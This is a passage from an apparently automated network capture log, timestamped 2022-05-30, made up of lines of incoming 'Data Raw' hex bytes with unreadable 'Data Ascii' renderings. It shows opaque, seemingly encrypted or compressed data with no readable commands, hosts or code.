fd 09 1f 14 8c 37 9b b9 c9 62 8c 4e 17 26 af 90 e0 c0 ab e0 09 79 bc d3 fe 7d 9b da d0 12 ac fe ec 68 22 Data Ascii: WuL5{S}FaN!Y&MOm1<s1sk(x&G#V,<#Svdjc8>@ O2:E^eBGJ5{jjBe%O<G)D(y/g>V*afg.]&9H&0Q:"-k\|C7bN&y}h"
2022-05-30 12:45:59 UTC	559	IN	Data Raw: f7 6e d2 1c 09 60 d7 3a 54 5b 60 f7 da e9 19 e6 d5 1d 3d f0 75 8f 6b d5 11 93 e0 74 b7 39 ab fb 05 d1 14 06 29 5d 03 67 19 e7 09 26 90 a0 f9 33 bb 86 83 b4 3b 52 cd 47 f0 11 da 34 dd ee 3f bd 5d 5f c5 54 ad 47 50 9c 1b e9 f2 c3 de ef 7c 8b 47 de b7 82 8c a1 49 aa ed df ce d7 01 7c 67 da 03 d7 cb 3c 81 28 e6 8f 98 58 90 43 65 f8 76 4c f8 a0 ae 26 ab 49 56 4d 2c 5a cd 9a 99 3a c2 72 0d 89 ee d4 fd 18 9f cd fa 0f db f8 cf 47 6e 92 b7 1b 8a 7f 78 a3 ee ba 41 70 4a 71 c0 5a 37 94 68 ba 55 17 cc 93 bd 59 91 64 87 34 35 7b 95 52 27 a2 70 6f db 13 88 24 9e 1a 9a 33 bb 1e ae a2 21 50 03 11 88 05 f5 aa 1b f2 b4 93 7e 90 1f ed 5d 93 4b 5a f3 51 39 04 16 2c d7 fc 6b 69 54 2d 46 d8 90 3d ee 97 c3 a5 1d 13 14 3b 4f 1d c0 ee b7 b6 8e 14 dd d3 c9 94 5c 0d 66 c5 6a d1 57 Data Ascii: n`:T[`=ukt9)]g&3;RG4?]_TGP\|GI\|g<(XCevL&IVM,Z:rGnxApJqZ7hUYd45{R'po$3!P~]KZQ9,kiT-F=;O\fjW
2022-05-30 12:45:59 UTC	561	IN	Data Raw: 5e ff 13 3f ab bd 17 d1 d3 ac df 99 d4 1e 1c b9 7f ad 9c 42 49 6f 6b 74 be 90 86 32 3b 96 ff 08 09 0b e6 ea c1 08 c8 f8 69 6f 9f 6f f6 3a fd 5b 4c d3 9e fc e7 8d 36 ae 64 88 80 cb 3a 75 6b 29 c4 57 6a ae b1 69 64 a8 71 13 a9 3a 25 01 fe 4f 8c cd 5f 9f 09 f4 2e b3 8d 2b 9e c3 cd 71 2f df e1 af 10 ac 07 da 30 da e7 33 f4 a2 26 a7 02 5e 0a 18 86 08 01 05 3a d2 52 35 06 15 88 05 cd f8 56 4b 63 e5 6c 0e fd 1a 6f 17 b5 05 c3 bd 60 da 7c cd 97 00 f5 c8 d6 84 c6 36 ed 62 c7 ff 16 92 2d a9 0e d2 00 5f ed 8e a5 43 85 83 02 5b e6 e3 8d d6 1f f9 f1 cc 33 31 a1 fb 8d bf 25 4c 9e 1d c0 a4 8b 9c 60 38 c2 43 d0 c8 98 8b 7c 48 6d 26 10 91 6b 3a 95 85 15 48 3f d6 8a 27 01 14 a2 8f ab 53 64 97 91 77 8c e3 23 b3 fa 6c 59 1f 01 15 7f e0 d9 b3 13 3e 8d cf 7a 26 a1 12 b6 bc 65 Data Ascii: ^?BIokt2;ioo:[L6d:uk)Wjidq:%O_.+q/03&^:R5VKclo`\|6b-_C[31%L`8C\|Hm&k:H?'Sdw#lY>z&e
2022-05-30 12:45:59 UTC	562	IN	Data Raw: 79 9b e9 f5 92 c4 bc f9 11 87 03 b5 7a 1c 27 5b 5e 3a 6d b6 75 83 d8 80 cd cc 45 94 a6 cf df 8e d7 4d be c7 ea 7f c8 96 e5 6e 8c 83 9e 4e 95 38 6e 57 2d 63 91 1c 27 54 1a 39 99 03 dd 66 0e 89 b6 f4 0b 29 9d 2e 0a af 3b 8c 63 75 3d 93 d5 db 33 6f f6 2f 3d 94 96 99 3c 66 b9 d6 aa 4e 07 a5 ae fa 2d d9 6b ea aa 6d d7 5d ec 8c c3 ad 58 fd 5b 04 4e 2c 2b 35 75 b0 fa 6e e2 e1 27 ba af aa 85 f9 5b 38 e8 41 fb b7 18 89 7f 19 45 f1 71 85 38 ac cb 7b 1a 29 d7 fc ab 7f 17 46 9d c0 4a 4c 37 8e 8f 05 92 f6 3e 1e 40 97 1b 40 ad 3a 69 33 c7 1f a4 01 54 f7 c3 db f6 a7 20 06 a2 48 12 54 81 fb 1e 2a 4a 66 3f 4a 4e f2 54 c9 32 41 6f f9 17 30 90 e4 77 ba 53 59 22 b3 b2 23 0d ec a4 d0 a3 55 43 97 48 ee 3e 10 e3 66 10 fb 13 3f ab cd 17 d6 df 08 50 dd a2 33 85 25 45 e5 bf c9 ce Data Ascii: yz'[^:muEMnN8nW-c'T9f).;cu=3o/=<fN-km]X[N,+5un'[8AEq8{)FJL7>@@:i3T HT*Jf?JNT2Ao0wSY"#UCH>f?P3%E
2022-05-30 12:45:59 UTC	563	IN	Data Raw: 9d ae cb 56 44 a1 24 8a e6 77 83 06 b4 11 02 49 bd 07 56 a8 69 ec 08 e6 68 61 ad 75 90 f5 4b 04 8c 37 1e aa a0 9a 95 29 36 f9 6a b8 60 2f 8e 69 e1 58 9c b5 83 e1 12 bd 81 12 51 a1 55 9a bb 23 1c 15 92 d9 cd 00 50 53 56 ba 83 e7 c5 aa 9f 49 80 3f 28 25 7a 9f b3 a2 f1 ef 4a 8f da b3 c8 17 ad 5f 95 02 5c c5 cd 90 dc 0b 6d 80 99 27 37 f8 a7 42 f7 02 de ed a1 37 56 03 7b 13 93 8f 22 c6 02 e8 98 bd 90 69 41 c9 d6 12 11 9d 16 21 37 4e 3c b6 3a ac f3 fe 2f 54 60 91 c8 b7 5a 2f fe b4 4b 64 04 28 09 a3 e9 e8 a0 58 bc 89 52 0d 35 47 33 a8 f7 ba f1 c8 a5 8a fd ca ce 23 3e 6a 47 0c 3c f7 c9 4a 93 92 cf 11 c2 21 15 63 b5 4b f3 b5 4d f9 02 fe 22 d2 27 1f a1 9a e3 54 6f 6b 97 31 ad f4 3a 23 88 ac a9 16 0d 58 86 a1 16 0c fa 84 5f 67 71 2c 91 40 01 23 d3 28 d5 49 dc 13 7e Data Ascii: VD$wIVihauK7)6j`/iXQU#PSVI?(%zJ_\m'7B7V{"iA!7N<:/T`Z/Kd(XR5G3#>jG<J!cKM"'Tok1:#X_gq,@#(I~
2022-05-30 12:45:59 UTC	564	IN	Data Raw: 3a f4 e3 34 bf ce b7 13 80 a8 25 da 72 64 ed 2d f7 61 ba ac 83 87 d8 e3 01 0f b2 c6 cd 02 2d fe 2e cc 53 55 95 0f db 8b aa ab eb 76 f7 72 31 7d f6 16 11 27 a1 e1 9c 2b 15 3d 97 00 06 f9 a0 2e 5b f3 48 47 9d 3e 4c ee 45 09 99 94 d0 c5 65 a6 21 ed df 81 21 b3 19 3b a5 06 ee 3d c5 69 bb 72 6f 75 92 25 5a 4c 1f 3b 2e ab 5d df cf e2 88 8d ca 43 17 82 2a d3 6a 50 f7 2b f4 61 19 c8 a4 d3 9c 7b 85 3c bc 04 11 f0 b7 b7 68 2a de cb 6e ee 7e 20 d8 11 47 65 1b cc 4d 1b d8 09 e5 45 8a ca e9 c4 d0 8f 96 14 b2 b6 d0 a7 e0 02 10 d2 4c c6 0d 1c 54 63 16 b7 e8 3c 60 fe 8d 72 9f 94 4b 7c c8 2a c2 c3 6a ad 3f 25 32 df ee 9c 17 e8 62 e8 ae 44 3a 5c 08 b3 93 87 f3 b4 0c d2 bc 16 a4 91 d0 b8 22 58 5c 4c 06 f0 72 4d 54 64 bf e4 11 5e 31 4a 3b ca 7d 7c 24 93 cb 17 5e 10 36 9d 50 Data Ascii: :4%rd-a-.SUvr1}'+=.[HG>LEe!!;=irou%ZL;.]CjP+a{<hn~ GeMELTc<`rK\|*j?%2bD:\"X\LrMTd^1J;}\|$^6P
2022-05-30 12:45:59 UTC	566	IN	Data Raw: 05 1c fa 81 e9 c4 8d 5d 96 87 c8 0d 69 be 37 d7 80 c2 e0 b9 36 d1 bd a5 66 78 85 43 7e d7 ce 03 84 33 83 e0 f6 0f bf ac bc d8 a5 d5 32 37 fb 45 2c 2b ee 88 04 5d 27 4d 4d 78 7f 5e e2 d8 87 5b 90 e7 c3 d5 3d 76 1b 08 56 a1 dd 75 57 7e 08 58 d7 82 ed 8d 42 6c e3 a6 e1 eb 07 9e 32 4b 3e 91 9b 14 24 d0 b8 42 0b b2 19 63 e9 ab 5f d0 75 37 90 da ff ab 52 01 7e e6 34 3b 6f fa 57 4a b7 3e 73 9a 7a a5 26 44 54 d9 46 79 81 46 40 e9 9f 77 e9 48 47 7c a1 99 4c b4 9e cf 1c f2 ae 5b 82 10 1c 86 8d 78 8d 6d 10 06 00 8d 47 cd fc 9e 1d 5a 3e 24 66 79 a7 91 15 fd 16 54 0f 0a 78 75 e9 44 3d 5f 90 c1 38 be d5 c7 8e b3 60 93 13 57 a2 3a e5 90 25 ad ae b8 58 44 26 bc 7e 04 c4 4a 6a e1 88 9c 08 71 c8 7d a2 85 3f 03 4f 39 91 fc 24 22 77 64 0a cd ed 25 3b b6 a7 1b 4e c5 ea 2e b3 Data Ascii: ]i76fxC~327E,+]'MMx^[=vVuW~XBl2K>$Bc_u7R~4;oWJ>sz&DTFyF@wHG\|L[xmGZ>$fyTxuD=_8`W:%XD&~Jjq}?O9$"wd%;N.
2022-05-30 12:45:59 UTC	567	IN	Data Raw: b3 7e 21 64 76 4c 0f f4 14 cd 8e 76 37 68 5f 5d 9b 46 47 74 6a 52 e2 a7 f3 c9 68 12 d7 ed 28 db bd 95 34 9b 78 34 35 7b 73 46 26 a2 7a c6 17 70 44 96 88 31 c5 88 ac 7b 05 70 71 dd c5 3d c0 60 cc e2 f0 89 2d be c3 06 83 3a d9 5d 4f 32 16 06 3d 35 e2 eb eb 62 d5 67 0f 1e a2 e2 c2 00 06 a0 c7 2e 55 9c c7 7d eb 8d c5 f9 18 f1 3d 17 7b b3 3a 75 93 8f 47 8a c1 ce 85 bd 0a af fe c2 88 cd 2c 0e 51 a2 15 4f ee dd 67 d6 79 56 a3 40 26 ff 8c 06 75 3b 94 51 9b 6a a0 91 94 aa be 6c 9c 06 d7 79 53 41 f2 73 6e 91 47 a2 7f 49 23 af f4 22 08 16 5d ab 0a ad e9 3d 41 4f d2 fe 74 38 f0 6b 3c 45 08 22 0f ab 9c 35 81 60 c0 ea 7f b4 ce d9 77 c0 a7 b2 ee 1d a6 1a ae 1f 47 e9 b1 65 20 66 7b 99 fc e2 92 13 c5 92 84 1c ec c2 90 b0 f6 4f 28 cc db 83 61 43 da d9 86 df 16 d4 6d 14 42 Data Ascii: ~!dvLv7h_]FGtjRh(4x45{sF&zpD1{pq=`-:]O2=5bg.U}={:uG,QOgyV@&u;QjlySAsnGI#"]=AOt8k<E"5`wGe f{O(aCmB
2022-05-30 12:45:59 UTC	568	IN	Data Raw: fd a3 64 cd ca 41 f1 99 3c eb b1 41 5a 49 77 dd 83 87 c7 42 ca cd 12 29 b9 e3 8a 10 65 79 eb dc 01 7b f7 bc 90 c8 14 95 93 66 c6 44 92 ff 72 b8 e7 c4 35 8c 47 5a a7 2e d2 7c c4 2f 65 8b cc fc 9d 1d d4 1e 55 6b 90 a0 c2 f4 2d 3d b8 ad 8a c7 a6 ae 37 48 33 32 1c 21 e8 36 69 9a af db 5d 3a fb ed 34 48 a4 90 a6 4f d4 d7 c6 0d df f6 ec 0a dd 93 c3 53 dd 4b c2 66 95 8f 5a 85 7f 76 c7 6f 6b c5 35 9b 41 97 df 6b 5c a9 77 ad 0e 11 8c 76 77 85 98 33 92 5a b4 8a d2 bc 16 a8 91 89 a8 22 58 53 9f c8 17 41 de 8c 63 77 83 fd 42 62 f4 7c 5b a3 b0 af 4d d4 cc 57 e4 e9 66 ae d9 76 36 7e e2 c3 d8 bb cf a9 de 77 54 88 6c b0 c6 18 2a 36 06 8b be 67 65 fa 2b 27 41 01 9d 0b a7 f9 d7 14 17 36 cd ba f3 21 9a 09 31 a7 7b 32 80 f4 c8 9b 8f 12 ab 05 c2 5d 9a 43 f3 3e 32 46 1c b5 03 Data Ascii: dA<AZIwB)ey{fDr5GZ.\|/eUk-=7H32!6i]:4HOSKfZvok5Ak\wvw3Z"XSAcwBb\|[MWfv6~wTl*6ge+'A6!1{2]C>2F
2022-05-30 12:45:59 UTC	569	IN	Data Raw: 0f 3d 09 aa f5 b7 72 16 39 f8 a9 08 17 c5 82 ed 6c 75 ee 11 92 53 30 ac e5 68 dc f1 7a 4b e1 74 f5 8b 37 24 bc b8 d3 8a 74 2d 80 a7 fa 58 da ec be 52 01 ad 80 3a 3b 66 1e df 1b 5d 6e 9b d2 86 e5 a1 10 5e fd f1 5f ee 63 f9 17 e3 3e 94 0b 41 0a 17 e3 31 39 d3 67 77 13 2a d1 0b c0 79 4c 11 3b b7 7d ec 22 d9 1b 95 8e cd 8b 13 39 6f d4 1c 20 4f e3 ac c5 ec 43 8c cc 90 1e b9 20 c2 d7 cd e8 fb 20 83 4f c8 b2 88 a3 8b 24 e4 9b fc 8a 10 eb 2b f3 12 c8 27 84 7f 0b d1 44 f6 3c 22 52 35 2e f2 52 a2 6f 07 8f 76 5b 3b 8c 44 cd 89 12 f4 ed 81 5f 92 72 32 66 f6 ec 75 4c a3 84 0e fa 01 1e b2 2f 36 aa 50 ef a5 10 5d 75 7f 32 25 1e 54 cd ef ba ce 67 3e 3f e3 a8 f0 f7 a1 e1 9c 5b 15 be 20 fe f9 22 00 b6 54 1f b6 02 66 0b 12 65 04 d5 55 f1 1b 3b 9a 24 44 78 6c 5a 50 d0 08 1e Data Ascii: =r9luS0hzKt7$t-XR:;f]n^_c>A19gw*yL;}"9o OC O$+'D<"R5.Rov[;D_r2fuL/6P]u2%Tg>?[ "TfeU;$DxlZP
2022-05-30 12:45:59 UTC	571	IN	Data Raw: 29 b1 22 84 af 95 17 87 d6 9f 3c b6 3a f0 91 84 72 9e 69 36 bc 0d d5 ee 96 b4 bf 88 e3 3e d1 0c 9c df 18 6e 0c 4b ee 18 dd 55 16 dd c7 69 3a 49 ea 2e 6a 2f d9 38 72 89 b9 81 70 53 1a 93 3d 6d 5b ea c2 21 15 3f b5 67 a3 b5 4d 1e 4d 57 36 1e f2 31 af 8d 9f ec 99 7c 3c 96 de 47 93 72 23 bc f8 57 06 59 f2 2e 4b 42 e3 2b af 6d 45 e0 44 b5 ff 51 d6 f6 28 b9 b6 84 96 f3 fd e8 e6 20 0b 1c 2d 3e 20 b0 db 2b 77 c7 67 fa d7 df 3e 05 dc 0e d3 8d 01 30 8d 82 a6 2d 46 8b 26 bd 1c 7c 14 b1 81 aa b3 29 49 0b a4 56 01 38 c2 e2 2c 10 ce e9 95 3b 0d 69 ce 37 21 ce c3 e0 61 7b 4e 66 28 af 75 96 c8 6d 43 46 1b c3 33 ba ab 1f 87 05 6b 8c 3f 38 98 f2 df 5a 3c 96 7c 35 c0 c4 ee 60 b2 b0 ab 08 e6 1d d8 8f 63 bf cb 82 2b c3 1c 02 e7 7f f7 33 88 23 4e b0 10 7a 70 52 43 8a 09 90 b7 Data Ascii: )"<:ri6>nKUi:I.j/8rpS=m[!?gMMW61\|<Gr#WY.KB+mEDQ( -> +wg>0-F&\|)IV8,;i7!a{Nf(umCF3k?8Z<\|5`c+3#NzpRC
2022-05-30 12:45:59 UTC	571	IN	Data Raw: 64 73 97 11 fe 93 2c a6 8a 0d 11 0c a0 f8 88 99 3e b8 48 f5 97 a7 28 27 20 56 47 72 89 e9 d9 9f 27 8e 01 9e f5 78 6e 38 a4 1b 4f e2 af 48 e7 f2 3f 4a 0c b2 7b 38 cc 1c 86 a6 2e 57 ee 1c 40 a7 29 33 07 c3 6e 22 73 1e ea bc 86 e8 af 7c ce da d4 3a 66 24 7f b8 91 df 1d 46 85 69 7b b9 17 c2 d4 f5 fd 21 da 30 7f de 71 0a 70 5c e1 63 40 a7 7b 47 b0 45 f9 d4 ae 33 1d fa b8 e7 31 46 3b 8a 1c 49 7b a8 aa f8 35 14 81 b6 20 36 e5 c3 d4 16 38 bb f8 7f fd fd c7 b7 d1 fe f7 7c 9d eb fd 25 38 b2 a5 cf f5 ee 2d 16 fb 01 6c b6 dc c5 fa 8c 03 eb 71 64 58 6e 68 33 57 e9 6e 76 ec 16 2c 71 6d d8 43 9e 0a 72 f8 b2 07 f4 18 ed 24 b8 dc 57 98 2f e0 a4 af e9 8f 5d 76 9e e1 15 36 d7 b2 93 af ed 40 87 d5 01 ff cc 2d b0 56 e1 c1 94 ae 27 10 2b 66 3b 0c 20 60 b7 8a 6a de 44 d2 84 ec Data Ascii: ds,>H(' VGr'xn8OH?J{8.W@)3n"s\|:f$Fi{!0qp\c@{GE31F;I{5 68\|%8-lqdXnh3Wnv,qmCr$W/]v6@-V'+f; `jD
2022-05-30 12:45:59 UTC	573	IN	Data Raw: 27 b8 7a a4 16 fb 55 bb d4 ed 9b a4 ed 00 d2 d9 09 8d e8 5a a6 e2 76 80 1a 7e 64 f9 0a eb 2a 41 17 bb 2b 22 79 48 49 3b be 86 0a f7 e0 d7 18 38 44 f3 5f 85 fe 9e 20 7b 0b 07 16 94 91 a6 d2 e3 23 61 fb 1c f0 f4 aa 42 2c 6f 12 f6 3c d1 cd 8a 83 d8 2b 4d b0 3e 65 27 cc 18 6a 93 19 71 ec d2 e1 2e ff 2d 52 ab 74 74 33 c8 fe f2 c4 76 78 9d 16 24 ac a3 d6 a2 a0 7d 7f b0 91 f2 9b 22 58 81 8c 62 3c 84 80 27 17 10 c7 4e 00 6a 29 ce 6c 40 d6 ff f2 04 df 76 ab ff 74 25 4a db f6 db 02 78 b5 ad 81 8c ef 60 04 8a 6c 5a 7f 15 67 05 7b 9b 2e 3a ee 0c f8 18 5b 9d 5c 4e a7 12 9f 14 17 f2 cd 5d bf 7e 8d 48 15 18 c1 b9 dd b9 d3 18 39 f1 14 34 80 79 c9 d0 5a 65 20 69 9a d0 2d 86 f5 4d 5c bb da ad b2 d6 90 3d aa e2 7e 4b 90 da 61 6d 80 7e 9d b5 72 e5 5f 13 fa ca 60 e5 9e 3b 73 Data Ascii: 'zUZv~d*A+"yHI;8D_ {#aB,o<+M>e'jq.-Rtt3vx$}"Xb<'Nj)l@vt%Jx`lZg{.:[\N]~H94yZe i-M\=~Kam~r_`;s
2022-05-30 12:45:59 UTC	574	IN	Data Raw: c9 8c b4 a4 34 14 04 07 95 75 37 9e 6d 92 d1 f9 75 c2 ef c6 4e a1 d6 83 c3 c7 69 fa 8f 0e 0b a1 88 96 9a 88 b7 e2 97 ae e8 75 36 e7 cd af e0 e8 54 68 bc 25 68 70 2f 17 a5 7d 10 d1 c5 29 5e 00 c5 07 cd e7 67 84 d9 34 d2 b4 e3 86 32 0e 78 b0 b3 fb fc fc ad 01 cf 90 92 14 9e d6 87 40 62 da 8f a5 dd 53 4d 9e a6 73 a9 a8 1e 6c c9 12 cf b6 63 f5 c5 3d 7a 80 80 71 36 af b0 50 9a 71 e1 96 68 4a b1 9c fc c5 80 18 e9 1b 40 53 12 49 da 59 16 a3 70 33 f3 74 8d 35 e3 7f 6c 4a 8f 48 8b 99 c8 77 fc 51 93 c3 db 5b f8 9f 84 17 b1 43 e4 48 ac 18 17 8d e4 5c 01 27 0d d3 52 3b 8f cd ed c4 24 22 22 33 b6 2f 2f b6 02 60 27 7e c3 43 76 ee 42 5d 89 41 62 ae 35 b6 80 87 68 44 fa cd 1a 4a f4 3c 58 ba 0e ce 07 ab 35 65 29 0f a1 f4 5b 67 64 03 bb fa 20 8b 86 18 7d b3 7a 3e 9c f3 03 Data Ascii: 4u7muNiu6Th%hp/})^g42x@bSMslc=zq6PqhJ@SIYp3t5lJHwQ[CH\'R;$""3//`'~CvB]Ab5hDJ<X5e)[gd }z>
2022-05-30 12:45:59 UTC	575	IN	Data Raw: 7b 71 41 5c 91 b7 ca 40 2c 02 52 eb 7d b1 7f e9 82 57 91 cc 91 77 ad 46 56 76 b1 97 fe 43 69 7d df 1b 77 7f b6 7e 6c 4a 31 7f 19 f8 a2 9e b3 84 17 72 f9 1c fb 95 7e df 38 03 be 2f 45 54 ca 3e ab 4e 13 5f e8 7e 08 c8 35 aa a9 ac 1e c3 b9 dc d8 c0 3d df c9 2d 01 74 38 c8 8c 71 e2 f0 be 44 13 f6 8b 20 a6 39 15 17 b7 54 87 fa 07 55 76 18 69 e3 b5 ff 9d 67 d3 e0 65 a2 5a 16 8d 03 7c fe dd cc b6 ab aa 67 c2 3b c4 43 47 14 73 46 3d 3b f5 2c ad 2e 3f b0 b0 52 0e 55 02 79 33 0d 3b 96 a7 0c 8f 66 af 90 c0 45 02 19 0a 11 dd 5b 3d d7 c8 78 0c 81 7f 3b cd be 31 94 dd ec 00 69 eb a5 32 e3 aa 47 d6 9c 66 50 b8 3c e3 89 71 ac 29 10 90 81 72 b5 64 83 ff f6 fe 0b 68 91 1d 1f 14 df 38 0f da 4c d4 a9 3c d0 0a 57 21 6f ad aa 34 0e 06 86 53 b5 6c db ca cb 1d 2b eb 2f 6c 22 49 Data Ascii: {qA\@,R}WwFVvCi}w~lJ1r~8/ET>N_~5=-t8qD 9TUvigeZ\|g;CGsF=;,.?RUy3;fE[=x;1i2GfP<q)rdh8L<W!o4Sl+/l"I
2022-05-30 12:45:59 UTC	577	IN	Data Raw: 86 df f9 7c d7 8d fb 97 b3 ba 69 2c 87 c2 d9 5f ed 6b f8 43 27 9f 13 6a 93 c4 d4 75 3b 20 b3 02 94 cf 65 d0 db f0 c8 fe e9 50 88 87 9b 1f e8 4c 53 89 58 5f 18 ed 28 87 ab 56 57 6f e4 99 d4 2a e5 4d 31 c9 9a 00 11 d5 7d 86 23 61 6b 10 ed e0 78 b8 06 dc ad e1 aa b3 a9 cf 17 ee 22 29 bb 8d 9f de 77 c6 da 93 f6 a4 d3 9e de 51 fc c5 67 9b 2b fe e3 54 6d e8 19 4f d4 46 67 ad 59 65 2f c5 89 56 f4 cd e6 3e 32 8e fa 76 83 2f f4 14 cb 32 38 17 d9 87 ee 4e ba 53 cf b7 22 f4 81 e4 43 02 bb a5 92 cc 4a 56 e6 34 12 7e e0 a3 c8 bc a5 53 ac 11 91 0e fb 88 45 98 e4 60 5b d8 5d 03 4b e1 23 b9 72 08 05 fe 53 1a f2 c6 08 79 a8 6a 9a c2 d6 81 59 d2 8e 4e 86 86 4c ae c6 87 64 dc 58 a2 e2 1b 99 06 90 c0 2e 55 49 d5 f4 a7 41 8c 84 b6 ca 0f 63 f3 d0 a3 71 a3 98 e9 46 d7 63 49 29 Data Ascii: \|i,_kC'ju; ePLSX_(VWo*M1}#akx")wQg+TmOFgYe/V>2v/28NS"CJV4~SE`[]K#rSyjYNLdX.UIAcqFcI)
2022-05-30 12:45:59 UTC	578	IN	Data Raw: ff 99 7b 8f e0 c7 1b 07 e3 97 bd 8e a7 4a 1e fc 16 87 c9 8a 53 92 1c 9e c6 3e 38 8c 00 44 1b 5e 37 c7 45 3d 00 d6 6f c3 b4 98 b8 15 51 b8 49 68 b6 0f b1 5b 69 42 e3 94 60 47 b8 91 ae 24 29 ca ef 63 d5 81 d0 e7 93 68 fc 2a 20 7b aa a8 19 73 b9 28 e7 ea cb e3 4a ec 9b 14 f0 74 fa 93 e9 12 25 de 7f 2b 31 bd 97 0f 8b 6c ff 02 bb d9 28 72 f3 2f f6 16 19 33 20 26 7f 14 a3 a3 77 74 22 ad a2 46 a1 b5 37 03 1a 6c da b7 91 00 6f 60 c1 4e 29 6a 4e 1d 82 ee 86 c7 99 3d 23 ca 2e 35 39 59 87 85 36 07 aa 25 26 ce 5b 6d 09 2a 2e 6c 60 52 39 87 f1 6f 9c 1e ed bb 56 b0 3f 90 9a 60 6b d4 0b 51 9c 5b b1 3c bc 4b 4d d4 fa b7 4c 93 a2 65 9f 06 a2 c5 28 6a 24 ef d7 44 62 fc 30 45 36 02 8a 22 68 0c d2 21 e2 a9 52 80 a0 b1 63 82 28 d3 ba 5b a3 b2 0a c0 4b ff ad 80 39 39 9b 6b cf Data Ascii: {JS>8D^7E=oQIh[iB`G$)ch* {s(Jt%+1l(r/3 &wt"F7lo`N)jN=#.59Y6%&[m*.l`R9oV?`kQ[<KMLe(j$Db0E6"h!Rc([K99k
2022-05-30 12:45:59 UTC	579	IN	Data Raw: de d6 c2 f3 a0 bc 99 a1 3b 53 f1 bc 99 53 25 1c 17 b6 a7 f6 a6 03 9d 1a 8f 14 e4 f7 30 ea 09 ad 2f 32 38 ff 9b 74 67 c1 11 fe 7c ab c9 39 5a 4a 83 4c 23 fa a6 32 4d 9a 08 89 96 69 bd ab 25 66 b2 f4 c3 14 36 0c ea c4 13 15 7f 62 3b b5 88 f6 99 b5 95 28 47 a9 f8 10 12 f8 5e 66 85 43 7e d7 ee 04 84 33 51 cb 11 bf e9 ac bc f3 40 28 3c 99 0a db d1 2b ab 19 d7 c1 61 27 a5 fc d3 dc 5f 10 ca 64 6d 66 39 6e c2 74 1e c0 b4 72 a8 bc 7f 1d 2e a9 6f 2d 43 56 75 91 cd 5c 5a 14 bf ae d3 b4 e8 9c 63 b1 c9 a3 2b ed 53 be b8 03 01 b8 45 83 ff 65 a7 27 a0 53 e9 fe d1 79 c2 6d 64 3a 3b 4b 32 92 a3 85 2a 40 2b 94 78 d9 9d 48 7c 37 ba 52 60 90 a5 60 74 9e 19 67 e3 51 f7 10 b2 fd 7f 8d 0a 05 97 a0 53 3a 36 93 87 9e ff 98 7b 02 fc 2e fa d7 3e 33 d4 1e 4e e3 21 46 59 b1 72 fd d6 Data Ascii: ;SS%0/28tg\|9ZJL#2Mi%f6b;(G^fC~3Q@(<+a'_dmf9ntr.o-CVu\Zc+SEe'Symd:;K2*@+xH\|7R``tgQS:6{.>3N!FYr
2022-05-30 12:45:59 UTC	580	IN	Data Raw: ed 5d 00 1b b5 36 29 6f 15 87 45 74 16 0f 39 81 07 dd 07 be 38 94 30 67 ce 40 d7 22 06 8c e8 77 70 fa 87 5a 86 7c 7b de b0 70 3a 98 93 37 6d 1b 05 4f 22 3a 83 0a 44 28 22 d1 9d d0 79 b4 ee 48 31 f7 b5 fa 53 cb ea 34 a6 f5 9f 64 de ba 59 8d 0d e8 e6 7d da bd 8e 07 0f 8b 0a 43 92 fd ec 5f f3 3c 0b 36 f0 cd f3 4e 78 65 0a f4 60 0e 06 d5 f0 a5 4b c9 d7 6b 01 75 53 93 ba fd b0 8c 87 11 df 2c 69 cd 67 ed ec 9a f5 e7 ed c8 dc 5d 4f 32 1b 1f e1 f2 88 c3 e3 7a 7f 67 35 b9 5c 4d 6f d4 2a 38 36 a8 45 14 17 f0 97 dc 90 9a ce 65 c2 e8 22 bd 2a 8a 49 e4 5a 4e 4b 3e 57 51 23 47 0c 3c f2 f2 0f e3 4b 9d 15 3a 6a 89 bc a3 4a f9 15 71 a0 c1 33 30 35 68 c2 da 83 99 7b 14 62 88 34 98 eb e1 c0 fc bf 6b a5 75 d8 7d 40 d9 69 fe c6 42 ec 2c 04 32 b0 95 4a 0b fd c0 47 17 ce 87 f3 Data Ascii: ]6)oEt980g@"wpZ\|{p:7mO":D("yH1S4dY}C_<6Nxe`KkuS,ig]O2zg5\Mo86Ee"IZNK>WQ#G<K:jJq305h{b4ku}@iB,2JG
2022-05-30 12:45:59 UTC	582	IN	Data Raw: 13 2f 10 52 8c 4f ed 7f 25 d6 4e 4e 8c cd 87 38 89 c3 26 b2 04 bf bc 62 0e b1 b2 c8 68 2d 48 c4 de 81 d7 97 5f 33 0a 25 27 a7 d9 71 1e c1 c0 08 b0 c3 7c 62 c1 3b 8a bd 88 ca 59 07 a9 91 01 17 76 1e 76 14 6c 44 82 4d 4c c9 1d 38 11 2b 4f 46 76 46 12 78 66 0a e5 bc 74 f5 bd 5b a5 45 8d bd 01 55 db 48 a4 14 6d 7a da d1 93 60 c1 38 53 e3 41 e9 0f 66 7e f5 3c d7 eb 0a 1d 50 88 0d 1c bc 47 3b c2 c0 44 ba 5d 28 ec a0 c2 f4 63 e9 0a fa e0 d7 1c f2 88 1b cc 27 89 4b c7 33 5a 03 ad 4b 79 2e 70 94 53 a2 0b 6e 59 92 0d 28 d1 39 9f 3a c5 0a a6 b6 3c 26 d4 94 ba e7 8e cf 1f b6 54 0a 1d bb 25 39 20 b3 88 55 c1 ed 9c ff 74 1f 0d 52 c9 76 f0 97 4d cf 44 0d c3 db e7 f0 32 b8 f1 d3 c2 dc a7 0c 79 42 94 1a 1d bf e1 1c 14 12 5e 31 2b 64 45 8c 34 fb 0a 84 33 42 71 fe 53 2f 52 Data Ascii: /RO%NN8&bh-H_3%'q\|b;YvvlDML8+OFvFxft[EUHmz`8SAf~<PG;D](c'K3ZKy.pSnY(9:<&T%9 UtRvMD2yB^1+dE43BqS/R
2022-05-30 12:45:59 UTC	583	IN	Data Raw: fe 91 b0 24 0a 10 58 ee 94 3b 0b aa 26 de b5 6a b8 d6 9e b8 f8 1e 84 f3 b6 4e cd b5 c0 aa 47 7b ef ba fd 92 2a 26 5d 36 3c 90 98 72 df 0a d7 ea 52 ae 32 94 84 13 5b cf 33 4b ee 11 0f 22 5d 89 71 85 41 f2 91 4c 8b a8 9a 20 84 23 4e 6b 61 2b 7d 12 06 0f 4d 61 14 94 82 c4 6f 58 51 5d f8 82 4e 63 a5 c9 8d da 3f 54 4e c8 cc 40 38 ee f5 59 32 47 9c 90 ff 2e 6c a7 7f 56 3f 57 1c d8 3f 73 43 94 30 5f 9d 12 d9 b9 a9 e2 e1 cd 16 60 fa 21 41 db 6e f0 13 fa 38 d3 ec 7a d1 16 a5 7d c6 5e 3c 60 92 51 da ee 56 ac ab a0 04 77 16 0e 47 6d db 99 6e ea d9 ac 03 d1 47 a2 8a 90 1f 24 b0 f1 05 46 e0 bc 53 ea 